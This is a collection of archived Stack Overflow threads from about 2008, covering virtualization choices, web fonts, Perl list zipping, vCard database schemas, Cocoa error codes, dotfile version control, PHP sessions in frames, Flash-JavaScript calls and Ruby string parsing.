A: Normally you would do this with a 3x3 Matrix, but the Matrix class only lets you specify 6 values instead of 9. You might be able to do this in Direct X.
A: When thinking of how 3D tools would handle it... try drawing a triangle of one half and then the other triangle for the other half. So if you have points A, B, C, & D; you would draw (with a clipping plane) A, B, C and then B, C, D, or something of the sort.
A: I found the following article in CodeProject:
Free Image Transformation By YLS
needs some works
maybe you can use this :)
A: Closest I can find is this information, which is extremely laggy.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38308",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: VMware or Hyper-V for Developers I'm looking to replace a couple of machines in the office with a more powerful multi-processor machine running either VMware or Microsoft's Hyper-V with a view to hosting a mix of Windows Server 2003, Windows Server 2008 and Linux operating systems. The machines are used mainly for testing ASP.Net or Perl web sites. I don't need advanced features like live migration of running systems but it would be useful to be able to restore a machine to a known state. Performance is not really a big issue either unless one is noticeable faster than the other.
My question is: Should I play safe and go with VMware or is Hyper-V mature enough to be a candidate?
A: Hyper-V works quite well and even supports Linux VM's. The main advantage is that if you are already running Windows server 2008 it comes along for free whereas you have to pay for VMWare separately. I think that VM ware provides better system management tools, but that isn't really a big benefit in this particular case.
I personally have used Hyper-V for development, i.e. running a vista machine for testing on top of a server 2008 box.
A: My problem with Hyper-V is that it kills performance on some things on the host OS, especially A/V stuff. Whenever I would be playing music on the host OS and do something that hits the disk hard (like compiling), the music would begin skipping. Similarly, playing streaming video, you'd have to wait until it was completely downloaded before it would play without skipping.
I've since switched back to VMware and couldn't be happier.
A: I like vmware. One nice feature is that it runs on multiple host OS's, so you can move your guest OS onto a linux server or a windows desktop as you like.
A: VMware did recently release a free version of ESXi recently.
VMware has a few advantages:
1. VMware virtual machines are portable across different types of hardware. IIRC, Hyper-V uses the drivers from the Host OS.
2. VMware virtual machines are portable across different VMware products (although you may need to use their converter tool to go from some hosted virtual machines to ESX or ESXi).
3. The VMware platforms have been in use much longer, and are quite mature products and generally better-known for troubleshooting.
With VMware, you could develop and test a virtual machine on your local system using VMware Workstation, Fusion, Server, or Player, and then deploy it to a production server later. With Hyper-V, I believe you would have to build the virtual machine on the target box for best results. If performance isn't really that big of an issue, then VMware Server may be the best option, for it can run most .vmx machines directly and is generally a bit easier to manage; if performance becomes critical, you still have the ESX or ESXi upgrade option that you can use those same virtual machines with.
This entry talks about how Virtual Server machines will not run on Hyper-V:
http://blogs.technet.com/jhoward/archive/2008/02/28/are-vhds-compatible-between-hyper-v-and-virtual-server-and-virtual-pc.aspx
A: A quick note regarding Windows Vista as a host for VMware Server, it doesn't work as well with Vista as the host OS compared to Windows XP as the host. The system pretty much locks up while VMware server 'boots' a virtual machine. After that has taken place, it isn't too bad to use. VMware Server 2.0 should fix these issues with Vista as the host OS. (I was using Vista Business RTM)
Also of note: VMware forbids any type of benchmarking to be posted on the internet unless if they authorize the data (i.e. you will not see any benchmarks that show VMware as slower than Tech X) The rumor mill states that you can see better performance with Hyper-V, xVM (Sun's enterprise version of VirtualBox) and Xen. However these things you would have to look into yourself as you won't really find anything via Google.
A: Necros the thread Just wanted to add my 2c since the last post has been a while.
I have been using VMWare Server since version 1.6 all the way up to 2.0.
Just out of curiosity, I tried out Hyper-V, and there's a real definitive performance gain. Hyper-V is plain faster.
Switched over 2 months ago and never looked back.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38323",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "9"
} |
Q: On the web, what fonts should I use to create an equivalent experience cross-platform? Because Linux (and its variants) have a completely different set of fonts than Windows and Mac OS X, is there anyone with any experience of creating cross-platform font families - ideally finding equivalents to the common fonts found on the aforementioned operating systems?
If so, what is the best route to take?
A: List of Web Safe Fonts.
A: Most OS'es have support for Microsoft's Core Fonts For the Web. They all come bundled with OSX, and I'm reasonably sure they'll work (or have near-identical variants) on most any linux distro.
The Microsoft Typography page is also pretty cool
A: Just to clarify: You are looking for names of fonts that will make your website-design look similar to Windows and Mac OS X when viewed under Linux, you are not looking to design new fonts, correct?
(I read your question in the same way that Jason Navarrete did, so at least two people misunderstood your question.)
The font names you are looking for might be something like the Liberation fonts that RedHat has released?
Incidently, 'sans-serif' doesn't give the user "any sans-serif", it gives the user his/her preferred sans-serif - which may arguably be better than one you pick.
A: Well, this is a hard question.
There are generally 3 fonts that are in some form or other always supported. These fonts are Adobe Times, Adobe Helvetica, and Adobe Courier. The problem is that while every system and foundry have a clone of these, they have different names. They are also not entirely the same, but have the same metrics. The windows trio: Arial, Times New Roman, and Courier New are the monotype clones of them. On linux these have been provided as bitmap fonts by adobe, and as outlines in form of the URW Nimbus {Sans, Roman, Mono} clones. The outlines however are not pretty on screen (they are on a printer) as they lack hinting.
The solution would be to go for a multichoice for websites. As microsoft has at some point made the "core fonts" available for redistribution, many unix/linux systems do have those fonts available. So go with them. The liberation fonts are straight clones of the MS/monotype fonts, so should go ok as alternatives with a similar experience. Then go for "Helvetica", "Times", and "Courier" before the sans/serif/mono choice that puts you in the user's hands.
A: Sitepoint has an excellent article on font stacks:
http://www.sitepoint.com/article/eight-definitive-font-stacks/
A: Here are some good up-to-date listings of the most-installed fonts for PC, Mac, and Linux:
Sans serif font sampler and survey results
Serif font sampler and survey results
Hope this helps your decision!
A:
TrueType Fonts (TTF) will generally work on Windows, Mac, and Linux platforms.
Thanks Jason, but this isn't the answer I'm looking for. Many Linux distributions come with their own fonts that are different in name to the Mac/Windows versions - presumably because of font licensing issues.
I'd like a response from a Linux user (preferably developer) who has experience with coming up with similar looking fonts. I really don't want to have to give Ubuntu Firefox users 'any sans-serif'.
A: This article explains the basic approach that has the most chance of working cross-platform. You have to think in terms of stacks which are sets of broadly similar fonts which cover most platforms.
You are always safe saying 'serif' which will get you Times New Roman or similar or sans-serif which will get you Helvetica/Arial or similar on most platforms. Then as the article suggests you can go further and distinguish between 'wide' and 'narrow' groupings.
You can take a more 'progressive enhancement' approach choosing your ideal font and providing generic substitutes for those platforms which do not have it. However at the end of the day the web is not print and you only get approximate control over font choice. You can do a lot of custom typography using the well-supported CSS properties such as line-spacing. But you will never be able to say 'use this font' and have it work the identically even across Mac/Windows/Linux let alone mobile devices, kiosks etc...
A: TrueType Fonts (TTF) will generally work on Windows, Mac, and Linux platforms.
http://en.wikipedia.org/wiki/TrueType
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38336",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "27"
} |
Q: Is there an elegant zip to interleave two lists in Perl 5? I recently "needed" a zip function in Perl 5 (while I was thinking about How do I calculate relative time?), i.e. a function that takes two lists and "zips" them together to one list, interleaving the elements.
(Pseudo)example:
@a=(1, 2, 3);
@b=('apple', 'orange', 'grape');
zip @a, @b; # (1, 'apple', 2, 'orange', 3, 'grape');
Haskell has zip in the Prelude and Perl 6 has a zip operator built in, but how do you do it in an elegant way in Perl 5?
A:
my @l1 = qw/1 2 3/;
my @l2 = qw/7 8 9/;
my @out;
push @out, shift @l1, shift @l2 while ( @l1 || @l2 );
If the lists are a different length, this will put 'undef' in the extra slots but you can easily remedy this if you don't wish to do this. Something like ( @l1[0] && shift @l1 ) would do it.
Hope this helps!
A: Assuming you have exactly two lists and they are exactly the same length, here is a solution originally by merlyn (Randal Schwartz), who called it perversely perlish:
sub zip2 {
my $p = @_ / 2;
return @_[ map { $_, $_ + $p } 0 .. $p - 1 ];
}
What happens here is that for a 10-element list, first, we find the pivot point in the middle, in this case 5, and save it in $p. Then we make a list of indices up to that point, in this case 0 1 2 3 4. Next we use map to pair each index with another index that’s at the same distance from the pivot point as the first index is from the start, giving us (in this case) 0 5 1 6 2 7 3 8 4 9. Then we take a slice from @_ using that as the list of indices. This means that if 'a', 'b', 'c', 1, 2, 3 is passed to zip2, it will return that list rearranged into 'a', 1, 'b', 2, 'c', 3.
This can be written in a single expression along ysth’s lines like so:
sub zip2 { @_[map { $_, $_ + @_/2 } 0..(@_/2 - 1)] }
Whether you’d want to use either variation depends on whether you can see yourself remembering how they work, but for me, it was a mind expander.
A: The List::MoreUtils module has a zip/mesh function that should do the trick:
use List::MoreUtils qw(zip);
my @numbers = (1, 2, 3);
my @fruit = ('apple', 'orange', 'grape');
my @zipped = zip @numbers, @fruit;
Here is the source of the mesh function:
sub mesh (\@\@;\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@\@) {
my $max = -1;
$max < $#$_ && ($max = $#$_) for @_;
map { my $ix = $_; map $_->[$ix], @_; } 0..$max;
}
A: Algorithm::Loops is really nice if you do much of this kind of thing.
My own code:
sub zip { @_[map $_&1 ? $_>>1 : ($_>>1)+($#_>>1), 1..@_] }
A: I find the following solution straightforward and easy to read:
@a = (1, 2, 3);
@b = ('apple', 'orange', 'grape');
@zipped = map {($a[$_], $b[$_])} (0 .. $#a);
I believe it's also faster than solutions that create the array in a wrong order first and then use slice to reorder, or solutions that modify @a and @b.
A: For arrays of the same length:
my @zipped = ( @a, @b )[ map { $_, $_ + @a } ( 0 .. $#a ) ];
A: This is totally not an elegant solution, nor is it the best solution by any stretch of the imagination. But it's fun!
package zip;
sub TIEARRAY {
my ($class, @self) = @_;
bless \@self, $class;
}
sub FETCH {
my ($self, $index) = @_;
$self->[$index % @$self][$index / @$self];
}
sub STORE {
my ($self, $index, $value) = @_;
$self->[$index % @$self][$index / @$self] = $value;
}
sub FETCHSIZE {
my ($self) = @_;
my $size = 0;
@$_ > $size and $size = @$_ for @$self;
$size * @$self;
}
sub CLEAR {
my ($self) = @_;
@$_ = () for @$self;
}
package main;
my @a = qw(a b c d e f g);
my @b = 1 .. 7;
tie my @c, zip => \@a, \@b;
print "@c\n"; # ==> a 1 b 2 c 3 d 4 e 5 f 6 g 7
How to handle STORESIZE/PUSH/POP/SHIFT/UNSHIFT/SPLICE is an exercise left to the reader.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38345",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "27"
} |
Q: Finding all messages with a given PR_SEARCH_KEY I need to query an Exchange server to find all messages having a certain value in PR_SEARCH_KEY. Do I have to open every mailbox and iterate through it or is there a faster solution?
Edit: This is for a program that needs to prepend something to the subject line of all copies of a message I got through a journal mailbox.
A: You haven't gotten any answers yet so I figured I would try a sub-optimal solution.
I'm not sure that you will be able to do what you need to do with the tool I'm going to propose (and, perhaps you are beyond this possible solution), but have you tried to find the messages of interest using ExMerge?
I've found that ExMerge can track down specific messages and get them for me across multiple mailboxes. It doesn't look like you can get directly to the PR_SEARCH_KEY value, but maybe there is another way to skin this cat.
You can download ExMerge at Microsoft Download for ExMerge .
Also, there are some good high-level details on ExMerge at the Microsoft Exchange Team Blog .
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38348",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Address book DB schema I need to store contact information for users. I want to present this data on the page as an hCard and downloadable as a vCard. I'd also like to be able to search the database by phone number, email, etc.
What do you think is the best way to store this data? Since users could have multiple addresses, etc complete normalization would be a mess. I'm thinking about using XML, but I'm not familiar with querying XML db fields. Would I still be able to search for users by contact info?
I'm using SQL Server 2005, if that matters.
A: Consider two tables for People and their addresses:
People (pid, prefix, firstName, lastName, suffix, DOB, ... primaryAddressTag )
AddressBook (pid, tag, address1, address2, city, stateProv, postalCode, ... )
The Primary Key (that uniquely identifies each and every row) of People is pid. The PK of AddressBook is the composition of pid and tag (pid, tag).
Some example data:
People
1, Kirk
2, Spock
AddressBook
1, home, '123 Main Street', Iowa
1, work, 'USS Enterprise NCC-1701'
2, other, 'Mt. Selaya, Vulcan'
In this example, Kirk has two addresses: one 'home' and one 'work'. One of those two can (and should) be noted as a foreign key (like a cross-reference) in People in the primaryAddressTag column.
Spock has a single address with the tag 'other'. Since that is Spock's only address, the value 'other' ought to go in the primaryAddressTag column for pid=2.
This schema has the nice effect of preventing the same person from duplicating any of their own addresses by accidentally reusing tags while at the same time allowing all other people use any address tags they like.
Further, with FK references in primaryAddressTag, the database system itself will enforce the validity of the primary address tag (via something we database geeks call referential integrity) so that your -- or any -- application need not worry about it.
A: Why would complete normalization "be a mess"? This is exactly the kind of thing that normalization makes less messy.
A: Don't be afraid of normalizing your data. Normalization, like John mentions, is the solution not the problem. If you try to denormalize your data just to avoid a couple joins, then you're going to cause yourself serious trouble in the future. Trying to refactor this sort of data down the line after you have a reasonable size dataset WILL NOT BE FUN.
I strongly suggest you check out Highrise from 36 Signals. It was recently recommended to me when I was looking for an online contact manager. It does so much right. Actually, my only objection so far with the service is that I think the paid versions are too expensive -- that's all.
As things stand today, I do not fit into a flat address profile. I have 4-5 e-mail addresses that I use regularly, 5 phone numbers, 3 addresses, several websites and IM profiles, all of which I would include in my contact profile. If you're starting to build a contact management system now and you're unencumbered by architectural limitations (think gmail cantacts being keyed to a single email address), then do your users a favor and make your contact structure as flexible (normalized) as possible.
Cheers, -D.
A: I'm aware of SQLite, but that doesn't really help - I'm talking about figuring out the best schema (regardless of the database) for storing this data.
A: Per John, I don't see what the problem with a classic normalised schema would be. You haven't given much information to go on, but you say that there's a one-to-many relationship between users and addresses, so I'd plump for a bog standard solution with a foreign key to the user in the address relation.
A: If you assume each user has one or more addresses, a telephone number, etc., you could have a 'Users' table, an 'Addresses Table' (containing a primary key and then non-unique reference to Users), the same for phone numbers - allowing multiple rows with the same UserID foreign key, which would make querying 'all addresses for user X' quite simple.
A: I don't have a script, but I do have mySQL that you can use. Before that I should mentioned that there seem to be two logical approaches to storing vCards in SQL:
*
*Store the whole card and let the database search, (possibly) huge text strings, and process them in another part of your code or even client side. e.g.
CREATE TABLE IF NOT EXISTS vcards (
name_or_letter varchar(250) NOT NULL,
vcard text NOT NULL,
timestamp timestamp default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
PRIMARY KEY (username)
) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
Probably easy to implement, (depending on what you are doing with the data) though your searches are going to be slow if you have many entries.
If this is just for you then this might work, (if it is any good then it is never just for you.) You can then process the vCard client side or server side using some beautiful module that you share, (or someone else shared with you.)
I've watched vCard evolve and know that there is going to be
some change at /some/ time in the future so I use three tables.
The first is the card, (this mostly links back to my existing tables - if you don't need this then yours can be a cut down version).
The second are the card definitions, (which seem to be called profile in vCard speak).
The last is all the actual data for the cards.
Because I let DBIx::Class, (yes I'm one of those) do all of the database work this, (three tables) seems to work rather well for me,
(though obviously you can tighten up the types to match rfc2426 more closely,
but for the most part each piece of data is just a text string.)
The reason that I don't normalize out the address from the person is that I already have an
address table in my database and these three are just for non-user contact details.
CREATE TABLE `vCards` (
`card_id` int(255) unsigned NOT NULL AUTO_INCREMENT,
`card_peid` int(255) DEFAULT NULL COMMENT 'link back to user table',
`card_acid` int(255) DEFAULT NULL COMMENT 'link back to account table',
`card_language` varchar(5) DEFAULT NULL COMMENT 'en en_GB',
`card_encoding` varchar(32) DEFAULT 'UTF-8' COMMENT 'why use anything else?',
`card_created` datetime NOT NULL,
`card_updated` datetime NOT NULL,
PRIMARY KEY (`card_id`) )
ENGINE=InnoDB DEFAULT CHARSET=latin1 COMMENT='These are the contact cards'
create table vCard_profile (
vcprofile_id int(255) unsigned auto_increment NOT NULL,
vcprofile_version enum('rfc2426') DEFAULT "rfc2426" COMMENT "defaults to vCard 3.0",
vcprofile_feature char(16) COMMENT "FN to CATEGORIES",
vcprofile_type enum('text','bin') DEFAULT "text" COMMENT "if it is too large for vcd_value then user vcd_bin",
PRIMARY KEY (`vcprofile_id`)
) COMMENT "These are the valid types of card entry";
INSERT INTO vCard_profile VALUES('','rfc2426','FN','text'),('','rfc2426','N','text'),('','rfc2426','NICKNAME','text'),('','rfc2426','PHOTO','bin'),('','rfc2426','BDAY','text'),('','rfc2426','ADR','text'),('','rfc2426','LABEL','text'),('','rfc2426','TEL','text'),('','rfc2426','EMAIL','text'),('','rfc2426','MAILER','text'),('','rfc2426','TZ','text'),('','rfc2426','GEO','text'),('','rfc2426','TITLE','text'),('','rfc2426','ROLE','text'),('','rfc2426','LOGO','bin'),('','rfc2426','AGENT','text'),('','rfc2426','ORG','text'),('','rfc2426','CATEGORIES','text'),('','rfc2426','NOTE','text'),('','rfc2426','PRODID','text'),('','rfc2426','REV','text'),('','rfc2426','SORT-STRING','text'),('','rfc2426','SOUND','bin'),('','rfc2426','UID','text'),('','rfc2426','URL','text'),('','rfc2426','VERSION','text'),('','rfc2426','CLASS','text'),('','rfc2426','KEY','bin');
create table vCard_data (
vcd_id int(255) unsigned auto_increment NOT NULL,
vcd_card_id int(255) NOT NULL,
vcd_profile_id int(255) NOT NULL,
vcd_prof_detail varchar(255) COMMENT "work,home,preferred,order for e.g. multiple email addresses",
vcd_value varchar(255),
vcd_bin blob COMMENT "for when varchar(255) is too small",
PRIMARY KEY (`vcd_id`)
) COMMENT "The actual vCard data";
This isn't the best SQL but I hope that helps.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38352",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Error Code Reference for OSX/Cocoa If I get an error code result from a Cocoa function, is there any easy way to figure out what it means (other than by grepping through all the .h files in the framework bundles)?
A: The sections on 'Error Domains' and 'Error Codes' in Apple's Error Handling Programming Guide address this reasonably well. You need to do the following:
*
*Log the error, taking note of both the error domain (a human-readable / Googleable string that tells you where to look for the error code definitions) and the error code itself (an integer)
*Sniff around on Google (or read from the list below) and figure out the name of the header file(s) where the error codes for that error domain are defined
*Search those header file(s) for the error code you got. You should find both a constant name for the error code (like ENOMEM), and hopefully also an explanatory comment (like /* Cannot allocate memory */) explaining what the error means. If there's no comment, and the constant name isn't self-explanatory, just Google the constant name and you'll probably find a proper description.
Some header files of major error domains:
NSCocoaErrorDomain
Error code declarations are spread across three header files:
*
*<Foundation/FoundationErrors.h> (Generic Foundation error codes)
*<AppKit/AppKitErrors.h> (Generic AppKit error codes)
*<CoreData/CoreDataErrors.h> (Core Data error codes)
NSURLErrorDomain
Check NSURLError.h
NSXMLParserErrorDomain
CheckNSXMLParser.h
NSMachErrorDomain
Check /usr/include/mach/kern_return.h
NSPOSIXErrorDomain
Check /usr/include/sys/errno.h
NSOSStatusErrorDomain
Check
/System/Library/Frameworks/CoreServices.framework/Frameworks/CarbonCore.framework/Headers/MacErrors.h
A: You should look at the <Framework/FrameworkErrors.h> header for whatever framework the method you're using that's returning an error comes from.
For example, an NSError in the Cocoa domain that you get from a method in the Foundation framework will have its code property described in the <Foundation/FoundationErrors.h> header. Similarly with AppKit and <AppKit/AppKitErrors.h> and Core Data and <CoreData/CoreDataErrors.h>.
Also, if you print the description of the NSError in the debugger, it should include not only the error domain and code, but also the name of the actual error code constant so you can look it up in the API reference.
A: Also, Cocoa's NSError is meant to be displayable to the end user. If you just log it, it should be readable.
If you're talking about Carbon's OSStatus and such, MacErrors.h.
A: For NSError errors add a line of code:
NSError *error;
// ... Some code that returns an error
// Get the error as a string
NSString *s = [error localizedDescription];
// Observe the code for yourself or display to the user.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38357",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "17"
} |
Q: Best version control system for managing home directories I have 3 Linux machines, and want some way to keep the dotfiles in their home directories in sync. Some files, like .vimrc, are the same across all 3 machines, and some are unique to each machine.
I've used SVN before, but all the buzz about DVCSs makes me think I should try one - is there a particular one that would work best with this? Or should I stick with SVN?
A: I've had this problem for years, and I don't think version control is necessarily the right way to go. I've had good success with the the Unison file synchronizer which is designed for the express purpose of maintaining consistent home directories on two machines. I'm currently managing seven replicas with unison, and the details are a bit tricky, but it is a great tool and if you start with two you will be extremely pleased.
The key difference between Unison and a VCS is that Unison is willing to delay dealing with conflicts that have to be merged. Plus it gets all the defaults right. And it is fast: I use it daily, over a DSL line, to synchronize about 40GB of data.
A: Any DVCS would likely work fine. My favorite is Bazaar. It would be easiest to keep your config files in .config, version that, and then symlink as appropriate.
A benefit of DVCS is that you can version the per-machine config files as well, without interfering with versioning global configs.
A: I've had the same problem, and built a tool on top of Subversion that adds permission, ownership and secontext tracking, keeps the .svn directories out of the actually versioned trees, and adds a concept of layers so you can for example track all your config related to development, which you then only check out on machines you use for developing.
This has helped me organize my settings much better across the 50+ machines I log into.
Here's the project page. It's still a little rough around the edges, but we also use it at work to version system configuration for our 60+ servers.
In general, any version control system that uses some sort of metadata files to track stuff is going to cause you pain as is when actually using it.
A: Version control software isn't really great for home directories. Worse, some software doesn't really like the .svn folders or starts to interpret their contents. You could of course try to fix this with some very complex mirroring setup, but that's hard.
A: Here's a Mozilla developer that's tried to do this: Version controlling my home dir, there's a couple of suggestions in the comments.
A: git or Mercurials's cheap branching would work great for this situation. I started with Mercurial, because it is simpler, but have subsequently moved to git.
A: One way to handle this very flexibly is to have a build directory under revision control, not try and svn your actual home directory (which has its own issues)
so inside this you keep a structure like
/home/you/code/dotfiles
/home/you/code/dotfiles/dotbashrc
/home/you/code/dotfiles/dotemacs
...
/home/you/code/dotfiles/makefile
and the makefile can contain logic for specializing files (or not)
might be heavier than you need, but if your actual setup is complex (I've done this across 3 or 4 different unices at a time) then it's worth doing something like this.
A: I use git for this. So far, I have been able to keep the home directories on several machines synchronized, with no need for branching and merging. Instead, I use git rebase. Conflicts so far have been few and far between and easy to resolve.
I keep files that need to have separate contents out of revision control by putting them into .gitignore.
I keep configuration files for the following tools in git:
*
*various shells
*emacs and applications, i.e.
*
*gnus
*BBDB
*emacs-w3m
*mutt
*screen
*various utilities and scripts
I keep notes and such in a subdirectory which has its own git repository.
A: I would suggest looking into etckeeper if you haven't already. It's designed for versioning configuration files in /etc using a version control system:
etckeeper is a collection of tools to
let /etc be stored in a git,
mercurial, darcs, or bzr repository.
It hooks into apt (and other package
managers including yum and pacman-g2)
to automatically commit changes made
to /etc during package upgrades. It
tracks file metadata that revison
control systems do not normally
support, but that is important for
/etc, such as the permissions of
/etc/shadow. It's quite modular and
configurable, while also being simple
to use if you understand the basics of
working with revision control.
Although it's designed for /etc I think it would probably also work well (perhaps with some adaptation) for home directories since the basic needs are the same.
A: I know this is an old thread but found it while searching for some dotfiles.
My current system is using subversion. The key thing I did was check out the working copy into ~/.svnhome/ (in hindsight should have called it .dotfiles or something more generic). I then create symlinks to the files I actual use on that computer into home. For example my .procmail and .spamassassin folders are only needed on the mail server so I don't link those on my home server.
The only file that has some differences is the .bashrc file has some extra lines on my mac for macports. So at the bottom of .bashrc I have it check if .bashrc_local exists and parses that.
This is the last remaining thing I have using subversion (everything else is using git aside from work). The benefit of svn is because it's not a dvcs so I don't have to worry about accidentally committing on one server and forgetting to push it.
I have considered moving it to git so I could create branches. Using the above example I would have a branch for my main server that I would add the .procmail and .spamassassin folders but not have those in the master branch. But the current system has worked fine for years--before git even existed--and don't have any particular motivation to change it now.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38362",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "11"
} |
Q: PHP : session variable aren't usable when site is redirected I've to admin a small website for my alumni group which is hosted by my ISV. The url is something like www.myIsv.com/myWebSite/ which is quite ugly and very forgetable. The main admin of the webserver has registered a domain name www.mysmallwebsite.com and put a index.html with this content:
<html>
<head>
<title>www.mysmallwebsite.com</title>
</head>
<frameset>
<frame src="http://www.myIsv.com/myWebSite/" name="redir">
<noframes>
<p>Original location:
<a href="www.myIsv.com/myWebSite/">http://www.myIsv.com/myWebSite/</a>
</p>
</noframes>
</frameset>
</html>
It works fine, but some features like PHP Session variables doesn't work anymore! Anyone has a suggestion for correcting that?
Edit:
This doesn't work both on IE and on Firefox (no plugins)
Thanks
A: Sessions are tied to the server AND the domain. Using frameset across domain will cause all kind of breakage because that's just not how it was designed to do.
Try using apache mod rewrite to create a "passthrough redirection", the "proxy" flag ([P]) in the rule is the magic flag that you need
Documentation at http://httpd.apache.org/docs/1.3/mod/mod_rewrite.html
A: What do you mean?
Are you saying that when you go from www.mysmallwebsite.com to www.myIsv.com/myWebSite/ then the PHP session is lost?
PHP recognizes the session with an ID (alpha-numeric hash generated on the server). The ID is passed from request to request using a cookie called PHPSESSID or something like that (you can view the cookies a websites sets with the help of your browser ... on Firefox you have Firebug + FireCookie and the wonderful Web Developer Toolbar ... with which you can view the list of cookies without a sweat).
So ... PHP is passing the session ID through the PHPSESSID cookie. But you can pass the session ID as a plain GET request parameters.
So when you place the html link to the ugly domain name, assuming that it is the same PHP server (with the same sessions initialized), you can put it like this ...
www.myIsv.com/myWebSite/?PHPSESSID=<?=session_id()?>
I haven't worked with PHP for a while, but I think this will work.
A: Do session variables work if you hit http://www.myIsv.com/myWebSite/ directly? It would seem to me that the server config would dictate whether or not sessions will work. However, if you're starting a session on www.mysmallwebsite.com somehow (doesn't look like you're using PHP, but maybe you are), you're not going to be able to transfer session data without writing some backend logic that moves the session from server to server.
A: Stick a session_start() at the beginning of your script and see if you can access the variables again.
A: It's not working because on the client sessions are per-domain. All the cookies are being saved for mysmallwebsite.com, so myIsv.com cannot access them.
A: @pix0r
www.myIsv.com/myWebSite/ -> session variable work
www.mysmallwebsite.com -> session variable doesn't work
@Alexandru
Unfortunately this is not on the same webserver
A: What browser/ ad-on do you have? it may be your browser or some other software (may be even the web server) is blocking the sessions from http://www.myIsv.com/myWebSite/ working from with-in the frame, as its located on a different site, thinking its an XSS attack.
If the session works at http://www.myIsv.com/myWebSite/ with out the frame you could always us a redirect from http://www.mysmallwebsite.com to the ugly url, instead of using the frame.
EDIT:
I have just tried your frame code on a site of mine that uses sessions, firefox worked fine, with me logging in and staying loged in, but IE7 logged me straight out again.
A:
So when you place the html link to the ugly domain name, assuming that it is the same PHP server (with the same sessions initialized), you can put it like this ...
www.myIsv.com/myWebSite/?PHPSESSID=<?=session_id()?>
From a security point of view, I really really really hope that doesn't work
A: You could also set a cookie on the user-side and then check for the presence of that cookie directly after redirecting, which if you're bothered about friendly URLs would mean that you don't have to pass around a PHPSESSID in the query string.
A: When people arrive @ www.mysmallwebsite.com I would just redirect to http://www.myIsv.com/myWebSite/
<?php header('Location: http://www.myIsv.com/myWebSite/'); ?>
This is all I would have in www.mysmqllwebsite.com/index.php
This way you dont have to worry about browsedr compatibility, or weather the sessions work, just do the redirct, and you'll be good.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38370",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "6"
} |
Q: Clone a control in silverlight What's the best way to clone a control in Silverlight (including it's children)?
UPDATE
Is there a better way in Silverlight 2?
A: Here's a great thread about serializing and deserializing objects in Silverlight 1.1.
As for a "best way," I'd say it would definitely be caching the xaml for the control and calling createFromXaml on it.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38378",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: How can I make flash cs3, actionscript send events to javascript? I'm using Flash to play an .flv movieclip on my site, but I want to have the .swf send trigger an event in my javascript when it start loading, starts playing and ends playing.
What is the best way to do that in Flash CS3 using Actionscript 3.0 ?
A: You need to use the "allowScriptAccess" flash variable in the HTML. You probably want to use "sameDomain" as the type. Note that if you go cross-domain, you also need to host a special file on the server called 'crossdomain.xml' which enables such scripting (the flash player will check for this. More info at http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_14213&sliceId=2
The call is the easy part. :-) In the Flash code, you'll use the ExternalInterface to do the call, as documented here:
http://livedocs.adobe.com/flash/9.0/main/wwhelp/wwhimpl/common/html/wwhelp.htm?context=LiveDocs_Parts&file=00001655.html
Short version: you say
ExternalInterface.call("javascriptFunction", "argument")
A: A common way to do this is with the ExternalInterface class, which you can use to call JavaScript methods.
First define your JavaScript methods, for example:
<script language="JavaScript">
function startsPlaying()
{
// do something when the FLV starts playing
}
</script>
Then modify your ActionScript to call the JavaScript method at the appropriate time:
// inform JavaScript that the FLV has started playing
ExternalInterface.call("startsPlaying");
For more information, see the related Flash CS3 documentation.
A: if you don't want to load
import flash.external.*;
so you can also do a
getUrl("javascript:startsPlaying();");
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38408",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "5"
} |
Q: How do I convert a Ruby string with brackets to an array? I would like to convert the following string into an array/nested array:
str = "[[this, is],[a, nested],[array]]"
newarray = # this is what I need help with!
newarray.inspect # => [['this','is'],['a','nested'],['array']]
A: You could also treat it as almost-JSON. If the strings really are only letters, like in your example, then this will work:
JSON.parse(yourarray.gsub(/([a-z]+)/,'"\1"'))
If they could have arbitrary characters (other than [ ] , ), you'd need a little more:
JSON.parse("[[this, is],[a, nested],[array]]".gsub(/, /,",").gsub(/([^\[\]\,]+)/,'"\1"'))
A: For a laugh:
ary = eval("[[this, is],[a, nested],[array]]".gsub(/(\w+?)/, "'\\1'") )
=> [["this", "is"], ["a", "nested"], ["array"]]
Disclaimer: You definitely shouldn't do this as eval is a terrible idea, but it is fast and has the useful side effect of throwing an exception if your nested arrays aren't valid
A: You'll get what you want with YAML.
But there is a little problem with your string. YAML expects that there's a space behind the comma. So we need this
str = "[[this, is], [a, nested], [array]]"
Code:
require 'yaml'
str = "[[this, is],[a, nested],[array]]"
### transform your string in a valid YAML-String
str.gsub!(/(\,)(\S)/, "\\1 \\2")
YAML::load(str)
# => [["this", "is"], ["a", "nested"], ["array"]]
A: Looks like a basic parsing task. Generally the approach you are going to want to take is to create a recursive function with the following general algorithm
base case (input doesn't begin with '[') return the input
recursive case:
split the input on ',' (you will need to find commas only at this level)
for each sub string call this method again with the sub string
return array containing the results from this recursive method
